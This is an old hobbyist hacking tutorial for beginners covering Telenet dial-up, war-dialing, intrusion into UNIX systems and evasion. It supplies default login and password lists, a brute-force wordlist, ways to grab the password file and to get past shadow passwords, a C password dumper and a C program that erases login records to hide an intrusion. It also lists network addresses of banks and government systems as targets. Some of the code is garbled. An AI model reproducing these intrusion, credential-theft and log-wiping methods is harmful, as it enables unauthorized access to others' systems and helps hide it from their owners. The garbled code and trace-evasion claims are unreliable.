special thankx to icekool of
hackershideout [http://hackersclub.com/km] for providing the basic
article..
Contents:
1.) What should I know
about hacking and where can I get started?
2.) What programs will I
need?
3.) I got the stuff, what now?
4.) What is Telenet
?
5.) I dialed it out, now what?
6.) How do NUA's
work?
7.) Help with NUA's
8.) What should I do once I found
a system?
9.) I'm in, now what?
10.) Cracking programs, what
they do and how they work.
11.) UNIX.
12.) Password
shadowing.
13.) Dialouts
14.) Scanners
15.) Brute
force hacking
16.) C-script to erasing your logins
17.)
Keeping yourself safe
18.) NUA's that I have found
19.)
Conclusion and Hackers Manifesto
Chapter 1.) What should I
know about hacking and where can I get started?
Welcome to the
world of hacking. You are probably asking why you want to be a
hacker right now. Well, first let me say that if you saw the
movie,"Hackers" don't think that that is hacking. It would be great if
they had terminals that automatically put you in a system and gave out
all those cool colors and welcome screens, but it's not that way. In fact,
hacking is like using DOS and C commands. So if you want to be a
hacker, realize that. Don't worry, it's still really cool. But before
you start, let's identify things, first off a terminal. This is what
you will use to hack. Click on ,"find" on the start menu of win95/win98.
Then type in ,"Terminal". It will either give you a hyper terminal or
a terminal. Both will work. I prefer the hyper terminal. Choose the
regular looking icon that says,"hyperterm" if you are using the
HyperTerminal after you click on its folder. If you want to use the
regular terminal, choose,"terminal". Now you will need to set
some things. In terminal, click on settings. Then click on
communications. You will have to mess with this stuff a little bit
because some systems use different paritys and databits, etc. What I
use is as follows:
Baud rate: 19200 parity: odd databits:
7 flow control:Xon/Xoff
For the hyper terminal, click on the
HyperTerminal folder in the find files or folders thing. Choose
hyperterm. Then it will ask you for a name. Call it anything you want. Now
it will ask for a phone #. Don't type a phone number in, look at the
bottom. It should say what type of modem you are using. Click on that
and choose the com port that your modem is using. Do the settings that
I listed above and hit ok. Now comes the part where you will need to use
certain commands that work for both programs. It will connect to your
modem and then you can tell your modem what to do. Here are the
commands that you can type. By the way, put "AT" before everything
except if you use "a/" or "+++".
at=ok atdp(phone number)=dials
out the number specified using a pulse dial up. atdt(phone
number)=dials out the number specified using a tone dial up. at e0=echo
off(not recommended) at e1=echo on(recomended,shows what you type in
your terminal!very important) at L0=speacker volume low at L1=higher
speaker volume at L2=default, medium at L3=high speaker volume at
a=lets a call be connected to your computer(note! you can wait in your
terminal mode and it will start saying"ring""ring""ring", type that
command in and hit enter. It Will connect whatever is calling
you!)
Chapter 2: What programs will I need?
Well, I
already mentioned about the terminal. That's your first program you should
get. Now go to either of these two addresses on the web to get your
hacking equipment:
www.hackersclub.com/km/files or
www.sodaphish.com
The programs that you should get are as
follows:
A-dial(or any scanner)- a scanner that will dial every #
from 0000-9999 in your local area.
Cracker Jack- One of the best
and fastest Crackers out there. John the Ripper is the best one
w/Win95/98
Modem Jammer- makes your calls
untraceable!
Chapter 3: I got the stuff, now what?
Study
how the stuff works and go to your local library and get some books on the
following systems:
1.) IRIS 2.) UNIX 3.) DEC/10 4.)
NOD 5.) VAX
Now get out your cracker and read the instructions
on how it works and look at the dictionary that it comes with (should
be "puffs.dic"). Go to the Hackerz Hideout(www.sodaphish.com) and go
to the newbie section and download lesson 1. Read on how it works and play
with it for a while. Now get out your terminal and get ready to dial
up your local telenet number!
Chapter 4:What is Telenet ?
Telenet is a network that is used for many purposes. This is where
most of your hacking will be done because hacking directly to an open
system is very risky! But if you use telenet and go to an outdial
(more on this later) then the chances are much less risky. So dial up your
local telenet number and get ready to hack!
Chapter 5: I
dialed it out, now what?
Here is what you will do. Remember how I
told you those modem commands? Here is how you would dial if you have
a pulse phone.
atdp265-8807
For
tone:
atdt265-8807
Ok. It should make a modem noise. I'm
sure you've heard this before unless you are really new to computers.
Here is a list of commands that you can use in
telenet:
C-Connect
D-disconnect
Mail-mail
Telemail-mail
full-network
echo (should be really good to use!)
half-terminal echo(I don't
recommend it, but try it and see what happens, just type"full"when your
done)
Stat-Shows network port
Set-Select pad
perimeters
Cont-Continue
Hangup-Hangs
up
Access-Telenet Account (Need username and
password)
Here is a trick that you can try. Once you have
connected, hit enter twice; then it will tell you you've connected to
telenet on a certain address. Now either hit enter once or type in the
type of terminal you are using. It should give you a prompt that looks
like this:
@
Now Type in telemail. It will say that it
is connected. Now type in"phones" for the username and password. It
will run down with a list of things. Try everything out that looks
interesting. You can also type in help at the login prompt and it will
ask you for an organization and a password. A good thing to
remember!
Whenever you connect to a system and it will ask
you"login" or "ugi" or "user id", etc... before you get cocky, try
typing some things in such as help, teach, learn,help login, help
logon, systat, and some other commands that you can think of by yourself.
Just type one of those in for the login name,or before it asks you to
login and see what happens.
Chapter 6: How do NUA's
work?
Well, NUA's are like little addresses that you can connect to
when you are in telenet. The way it works is by typing in an area code
and then typing in any number after- words. It would be something like
this: ____ @033|798|- the number
after-words -|-------- areacode
That would be the area code
of cal. There is also something that you might see in front of it. It
would look like this:
03110 033 0079800
The number in
front(03110) is the pad that you are connected to. This is very important
because you cannot always connect to an NUA because it will not always
have what is called reverse charging. Reverse charging is sort of like
you dialing someone's number collect. But I will explain more about
this in the Help with NUA's section. You probably noticed that
there were some zeros in the 798 part. A lot of times you will find
this in systems. But usually you can ignore this.
You can also
put a "c" in front of the NUA. It would look like this:
@c540
798
Note! Whenever I put a @ in front of a number like I just did,
don't type that in, all you would have to type would be "c540 798".
That is just the prompt.
Chapter 7: Help with NUA's
Not
to many things have worked with NUA's that I have found. Although you
could try these commands at the login prompt:
1.) help 2.)
learn 3.) list 4.) list users 5.) games 6.) List games 7.)
help logon 8.) help login 9.) and anything else that comes to your
mind. Use common sense.
If you try connecting to an NUA and it says
that there is reverse charging,you can get by this by either connecting
to another pad that isn't long distance to that NUA or you can use
what is called an NUI (Network User ID). The NUI is faster but they
are very hard to find. I wouldn't even try it,but if you want to, here is
what you would do. Say that you liked system:
201 432
You
would put a coma after the NUA and type the user name and then type in a
password. For example:
201 432,username,password
I would
stick to the pads rather than this, it is much easier. Although, there are
plenty of systems that will except reverse charging, so I personally
just leave them alone. There to much trouble.
Another problem
with NUA's is that you will try to connect to one and it will just sit
there and stare in your face. You will always know that when this happens
that there is not a system. It will probably always just sit there. If
you get stuck like that for to long, telenet will knock you off. That
is very annoying! But I finally found a way to get past this. All you
have to do is hold down the shift key and hit the "2" button and then hit
enter. Then it will bring you back to the "@" prompt. Now hit "d" and
hit enter to disconnect. Now you're all set to try another
NUA.
Chapter 8: What should I do once I found a system?
Your
first objective is to identify what type of system you have found. There
are 2 ways to do this. The first and easiest way is to look for a copy
of the LOD (legion of doom) and it will have most all the info that you
will need on identifying systems. The second and best way to do this
is to go to your local library or bookstore and read up on all the
systems you can. Basically,I am saying to get LOD's copy and look at
the systems they are talking about and get books on those
systems.
Once you've identified the system, first try the defaults
that you have. If your defaults worked, that's great, move on to the
next chapter, if not, do some research in the library section of the
hackers hideout on sniffing and spoof ID.
Chapter 9: I'm in, now
what?
Well, I agree with LOD. I can't tell you what to do once you
got inside the system. It is totally all up to you, you are the hacker
which means that you are in command. I would recommend looking in the
books that you got on the system that you are in and look at all of
its useful commands. Try everything out, don't be afraid, you can't go any
further unless you try different things out. Search the system to your
desire. Have fun!
Chapter 10: Cracking programs
A while back
I said something about Cracker Jack. That is the type of Cracker that I
will be referring to. Cracker Jack comes with a dictionary called,
"puffs.dic". In the next chapter you will learn how to obtain passwords
in a UNIX system, so this will be very useful. Say you see some
passwords you want to crack. It goes like this, a word is scrambled
(encrypted). A cracker will take this word and look at it with its
dictionary. here is a sample:
akcihgn
The dictionary will
look at it and look at every word in the English language that has
seven letters and has each of those very letters. A lot of times, you
will get lots of possible words, but one of them is the real password!
In this case, it is "hacking".
Chapter11:UNIX
Well,
if you finally found your first UNIX, then this is going to be a treat!
First of all, UNIX will greet you with a welcoming message and then
will say, "Login". To login, all you have to do is type in some
defaults. Here they are:
login: root pw: root login: root
pw: system login: root pw: sysop login: sys pw: sys login: sys
pw: system login: daemon pw: daemon login: uucp pw: uucp login:
tty pw: tty login: test pw: test login: unix pw: unix login: unix
pw: test login: bin pw: bin login: adm pw: adm login: adm pw:
admin login: admin pw: admin login: sysman pw: sysman login:
sysman pw: sys login: sysman pw: system login: sysadmin pw:
sysadmin login: sysadmin pw: system login: sysadmin pw:
sys login: sysadmin pw: admin login: sysadmin pw: adm login: who
pw: who login: learn pw: learn login: uuhost pw: uuhost login:
guest pw: guest login: host pw: host login: nuucp pw:
nuucp login: rje pw: rje login: games pw: games login: games pw:
player login: sysop pw: sysop login: demo pw: demo
When these
defaults don't work, you will have to use brute force hacking which you
will learn later on. What you will do is use the default for your
login name, then use the list of passwords. For example:
login:
sysadmin password:(every password in the list)
If sysadmin
didn't work move to the next default and use every password, then to the
next etc. Here is the list of defaults to
use:
adm admin ann anon anonymous/anonymous backup batch bin checkfsys daemon demo diag field ftp games guest/guest
guest/anonymous help install listen lp lpadmin maint makefsys mountfsys network news nobody nuucp nuucpa operator powerdown printer pub public reboot rje rlogin root sa setup shutdown startup sync sys/sys sysadm sysadmin sysbin/sysbin
sysbin/bin sysman system tech test trouble tty umountfsys user/user
user1/user1 uucp uucpa visitor
Once you are in, save the
account to a floppy. To access the password file on UNIX, type in this
command:
etc/passwd
Now download the password file. This can
be done by typing "d". If you type in this command and nothing shows
up, try typing in "cat_/etc/passwd". If that doesn't work, then the
UNIX system might not have what is called a shell account. In that
case, move on to a new system. Ok, If you got the passwd file
downloaded, take it to your cracker and crack it. If you have trouble
cracking it, make sure that you typed in the right dictionary (puffs.dic)
and the file of the passwd. Now look at one of the accounts, it will
probably have a list of words that could be the password. Try every
word that it gives you, one of the words will definitely work! Now
finally log on as that user and change his password. Well, you've done it!
You own the account. If you want to go a little further, look for the
password on the "sysadmin and root". You would login like
this:
login:root password:(password)
login:sysadmin password:(password)
I
hope that that helps you out. Remember, if you logon as the superuser
(root), you have total command over the whole system. So act normal and
if anyone tries to talk to you, act like you would if you were the
sysop (system administrator), and NEVER manipulate files!
NOTE!
This is what a passwd file will look like when you get
it:
John:234abc56:9999:13:John_Johnson:/home/dir/John:/bin/John.
Here
is what it is broken down:
Username: John Encrypted password:
234abc56 User # 9999 Group# 13 Other information: John
Johnson Home directory:
/home/dir/John Shell:/bin/John
Chapter12: Password
Shadowing
Unfortunately, today most all UNIX systems have what is
called password shadowing. It is a type of security that the admins use
to keep hackers out. The password is still encrypted but you can't see
the encrypted passwords. Here are Three ways that I have heard of to get
around this. The first one is simple, you find the shadowed passwords
in a different directory. I will name the system, you type in what is
on the right. That will enable you (hopefully to find the encrypted
passwords)but first, here is how you can identify a shadowed password.
Look at this list and notice how there is either a * or an X in the
passwords
place:
root:*:0:3::: ftp:*:500:19::: aolbeta:*:295:20::: macbeta:*:297:20::: atropos:*:228:20:::
In
this case the * was in place for the encrypted password. Here is a sample
of the other type I have
seen:
Cougar:X:5:9987:/home/dir/bin
Now to defeat this here
is the first way:
UNIX Path
Token ----------------------------------------------------------- AIX
3 /etc/security/passwd ! or /tcb/auth/files// A/UX 3.0s
/tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10
/etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/
* EP/IX /etc/shadow X HP-UX /.secure/etc/passwd * IRIX 5
/etc/shadow X Linux1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag]
* SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2
/etc/security/passwd.adjunct ##username SunOS 5.0
/etc/shadow
System V Release 4.0 /etc/shadow X System V Release
4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS
/etc/udb *
Here is the second way. This is more confusing
because you need to understand what a loop is. I got this out of the
Library section of the HackerZ Hideout. So you can look in there too if
you want :)
This trick will only work with certain systems. Notice
how the loop works. It is very important to the hacker. If you can
find anything on loops, read it! It is great knowledge to have,but
even I have trouble understanding it. Once you are in a Unix system, and
of course, the passwd file is shadowed, try typing in "ypcat
/etc/passwd >~/passwd"instead of"etc/passwd". Now download the
passwd file from your home dir. Here is the trick, type in:
rm -f
~/.lastlogin
ln -s ~/.lastlogin /etc/passwd
Now logout and
then back in so that you create a link.
cat .lastlogin >
passwd rm -f ~/.lastlogin
That way is a little tricky, but
read up on loops and maybe it will work out for you. Here is the third
and final trick. It is probably the best way because supposedly, it works
with everything. What you will do is write a C-script. For those of
you who don't know what a C-script is, it is a program that you write
out in the C language Such as C++. You can get C++ at the store or ask
around to warez pups. They should have it. What you will do is write it
out. Then what you will have to do is go and compile it. It shouldn't
be to hard. Anyway, here is the script:
struct SHADOWPW
{ /* see getpwent(3) */ char *pw_name; char *pw_passwd; int
pw_uid; int pw_gid; int pw_quota; char *pw_comment; char
*pw_gecos; char *pw_dir; char *pw_shell; }; struct passwd
*getpwent(), *getpwuid(), *getpwnam();
#ifdef elxsis?
/*
Name of the shadow password file. Contains password and aging
info*
#define SHADOW "/etc/shadowpw" #define SHADOWPW_PAG
"/etc/shadowpw.pag" #define SHADOWPW_DIR "/etc/shadowpw.dir" /* *
Shadow password file pwd->pw_gecos field contains: * *
<type>,<period>,<last_time>,<old_time>,<old_password> * *
<type> = Type of password criteria to enforce (type int). *
BSD_CRIT (0), normal BSD. * STR_CRIT (1), strong passwords. *
<period> = Password aging period (type long). * 0, no aging. *
else, number of seconds in aging period. * <last_time> = Time
(seconds from epoch) of the last password * change (type long). * 0,
never changed.n * <old_time> =Time (seconds from ephoch) That the
current password * Was made the <old_password> (type long). *
0, never changed.ewromsinm * <old_password> = Password
(encrypted) saved for an aging <period> t * prevent reuse during
that period (type char [20]). * "*******", no
<old_password>. */
/* number o tries to change an aged
password */
#deffine CHANGE_TRIES 3
/* program to execute to
change passwords */
#define PASSWD_PROG "/bin/passwd"
/*
Name of the password aging exempt user names and max number of entir
#define EXEMPTPW "/etc/exemptpw" #define MAX_EXEMPT
100
/* Password criteria to enforce */
#define BSD_CRIT
0 /* Normal BSD password criteria */ #define STR_CRIT 1 /* Strong
password criteria */ #define MAX_CRIT 1 #endif elxsi #define NULL
0 main() { struct passwd *p; int i; for (;1;)
{; p=getpwent(); if (p==NULL)
return; printpw(p); } }
printpw(a) struct SHADOWPW *a; {
printf("%s:%s:%d:%d:%s:%s:%s\n", a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid, a->pw_gecos,a->pw_dir,a->pw_shell); }
/*
SunOS 5.0 /etc/shadow */ /* SunOS4.1+c2 /etc/security/passwd.adjunct
*/
Chapter13: Dial outs
A NUA can sometimes connect you
to what is called an outdial. An outdial is a modem that you can get to
through the NUA. A good use for this is to use a scanner and dial every #
from 0000-9999 on a 3-digit prefix in your area for a list of computers
you can hack into. You can also hack them through this outdail. More
on scanning later. Another great use for outdials is to dial up
long-distance BBS #'s or other telenet #'s or any # of things you can
think of! Also it is much harder and more expensive to trace a call if
you are using an outdial. It will be traced to the system.
A
thing that you should do before you even attempt to dial out a number is
the redial command. This is because it will dial out the number that
was dialed just before and is an excellent way to find new systems to
hack:). Also, on a ventel modem, type "d" and it will list 5 modem
numbers in its memory that you can connect to! So I guess right now you're
saying, "Well, how do I find one of these outdials?"Well, you will need
to find a system called a, "Decserver". What I would recommend is to
get a list of NUA's from somebody or a magazine such as phrack#21, or
2600. They should have a list of them in there.
Chapter 14:
Scanners
A scanner is a program that will dial every # in a 3-digit
prefix from 0000-9999. For example:
My telephone number is
898-3788 (not right) so if I thought my school was in the 898 area, I
would put in "898" for the 3-digit prefix and set it to dial every
number from 0000-9999. Using 898 in the front o each number, I am
certain to find the number that my school modem is at and every other
modem that will connect me to a system. Just make sure that you either
dial *67 if it asks you for a certain code thing so that your calls
cannot be traced or just use an outdial.
Note! A good thing to do
whenever you hack is to either use a converter or a modem jammer. This
will also prevent your calls from being traced :)
Chapter 15: Brute
force hacking
Brute force hacking is a method made for systems that
don't keep track of you trying to login such as UNIX. You will notice
that on some UNIX boxes that the default will not work. It can be very
frustrating! This method approaches the system by typing the default in
where it ask you to login and use this whole list of words for
passwords. You have to do it over and over again. It will take a long
time, but every hacker must be patient. An example of what I am saying
is doing something like this:
login: sysadmin password:
aaa login incorrect login: sysadmin password: academia
etc.
I am not sure how you would make a program that can make brute
force hacking a lot easier, but I am sure that there is a way and if
you look around on the web a little bit, I am sure that you would be
able to find the C-script. So just search around a little bit.
As
you see, it takes a lot of work. You will have to do this for each
default, so just be patient. Most of these passwords come from LOD. I
put a few in there but not nearly as many as
them.
------------------------------------------------------------ Brute
force
hacking ------------------------------------------------------------
aaa academia ada adrian aerobics daniel danny dave
deb debbie jester johnny joseph joshua judith rascal really rebecca remote
rick airplane albany albatross albert alex alexander algebra alias alpha alphabet ama amy analog anchor andy andrea animal answer anything arrow arthur asshole athena atmosphere attention aligator alpine altitude billy bacchus badass bailey anana bandit banks bass batman beauty beaver beethoven beloved benz beowulf berkeley berlin beta beverly bob brenda brian bridget broadway bumbling bubbles buger belt bitch basturd bee butt bust bib cardinal carmen carolina caroline castle cat celtics change charles charming charon chester celebrate cattle cadabra chilly chelsey cucumber deborah december desperate develop diet digital discovery disney dog drought duncan dudu dust dimple dip doodle dildo dic disaster damn dig dug easy eatme edges edwin egghead eileen einstein elephant elizabeth ellen emerald engine engineer enterprise enzyme euclid evelyn extension fairway felicia fender fermat finite flower foolproof football format forsythe fourier fred friend frighten fun fagot fumble fabulous fix fiddle finger gabriel garfield gauss george gertrude gibson ginger gnu gol golffer gorgeous graham gryphon guest guitar gilbert hacker hug halarius hell heep hip hop hope humble hill head hello heck huddle ireland juggle julia kathleen kermit kernel knight kathy lambda larry lazarus lee leroy lewis light lisa louis lynne list limp mac macintosh mack maggot magic malcolm mark marck marc markus marty marvin master maurice merlin mets michael ichelle mike minimum minsky mogul moose mozart nancy napoleon network newton next olivia oracle orca orwell osiris outlaw oxford paciic painless pam paper password pat patricia penguin pete peter reagan robot robotics rolex ronald rosebud rosemary roses ruben rules ruth sal saxon scheme scott scotty secret sensor serenity sex shark sharon shit shiva shuttle simon simple singer single smile smiles smooch smother snatch snoopy soap socrates spit spring subway success summer super support surfer suzanne tangerine tape target taylor telephone thomas temptation tiger toggle tomato toyota trivial theresa unhappy unicorn unknown cigar classic cofee harmony harold harvey philip phoenix pierre urchin utility vicky coke collins comrade computer condo condom cookie cooper create creation creator cretin daemon dancer heinlein hello help herbert honey horse imperial include ingres innocuous irishman isis japan jessica pizza plover polynomial praise prelude prince protect pumpkin puppet rabbit rachmaninoff rainbow raindrop random virinia virgin warren water weenie whatnot whitney will william willie winston wizard wombat yosemite zap ------------------------------------------------------------
Well,
like I said, I added a couple words in there, maybe 20 or so, but most of
these come from LOD. In my next book, I will keep every UNIX password
I get and have my own password list.
Chapter 16: C-script for
erasing your logins
Well, if you want to really be secure, this is
one of the best ways! There might be some ways that you could think of
typing in to erase it but it won't work. Only a program can erase your
logins. Aren't programs great:) I already told you what a C-script is so
just copy this or type it in in your C program and then compile it.
------------------------------------------------------------
#include #include #include #include #include #include #include #include #define
WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define
LASTLOG_NAME "/usr/adm/lastlog"
int
f;
void kill_utmp(who) char *who; { struct utmp
utmp_ent; if ((f=open(UTMP_NAME,_RDWR))>=0) { while(read (f,
&utmp_ent, sizeof (utmp_ent))> 0 ) if
(!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char
*)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)),
SEEK_CUR); write (f, &utmp_ent, sizeof
(utmp_ent));
} close(f); } }
void
kill_wtmp(who) char *who; { struct utmp utmp_ent; long
pos;
pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0)
{
while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp))
*pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0)
{ pos = -1L; } else { if
(!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char
*)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp))
* pos),L_XTND); write (f, utmp_ent, sizeof (utmp_ent)); pos =
-1L; } else pos += 1L; } } close(f); } }
void
kill_lastlog(who) char *who; { struct passwd *pwd; struct
lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if
((f=open(LASTLOG_NAME, O_RDWR)) >=0) { lseek(f, (long)pwd->pw_uid
* sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll
)); close(f); }
} else printf("%s:
?/n",who); }
mai(argc,argv) int argc; char *argv[]; {
if (argc--2)
{ kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]);
printf("Zap2!/n"); }
else printf("Error./n"); } ------------------------------------------------------------
Well,
that is an excellent way to keep yourself safe. I would highly recomend
it!
Chapter 17: Keeping yourself safe
Well, the things
that you will mostly need are up at the front in the list that I gave
you of stuff that you will need. What I would recommend is
to:
1.) encrypt your hard drive 2.) use a modem jammer before
you even get onto telenet 3.) first find yourself an outdial, then dial
up another number that you are interested in hacking or dial up into
another telenet number and connect onto there and hack some NUA's
from there. 4.) Don't brag to anyone! about you hacking any systems.
5.) Never Hack Government systems unless you know what the hell your
doing and plan on moving. 6.) Never hack unless u got pretty knowledge
about it..
If you pretty much do that, I would say that you should
be safe.
Chapter 18: NUA's that I have found
Unfortunately
Almost all of the NUA's that I have found are government systems. There
are a few that seem like they might be pretty cool, but make sure that
you know what you are doing!
NUA TIPS
201 156 A UNIX
system! excelent to start out with but the problem is that it is
for more experienced UNIX hackers.
90155 ?
2241 It will
say"DTE". Seems to be a bank up in main.
22417 Government
system, leave it alone!
22425 ?
2236 Gives you a
"<"prompt. tell it anything, when you go to login, it will ask
for a transaction ID.
3215 NASA, LEAVE IT
ALONE!!!!!!!!
22430 Bank in Athens Greece. Looks very
interesting!
201170 asks you to enter a command
201179
asks you for an application
201200 Not sure, wouldn't take a
chance
201201 same as 201200
202255 type "help" then choose
your terminal type. I wouldn't take any chances though, looks a
little tight on security.
This book was intended for
newbies. I am stuck between being an intelligent hacker and newbie, but
as soon as I get some books on some newer systems and learn how they work,
I will be putting in all the defaults and helpful commands. It wont
have as much newbie material, it will be for more experienced hackers.
I hope this file has helped you with all of your hacking needs. When I
was a newbie there wasn't to many things to look at, it was all trial and
error. It still will be for you, but you have a better idea of what
hacking is like. All I recommend for you to do now is to read more
books.
Special Credits to : 1. Icekool 2.
LOD 3. The Mentor |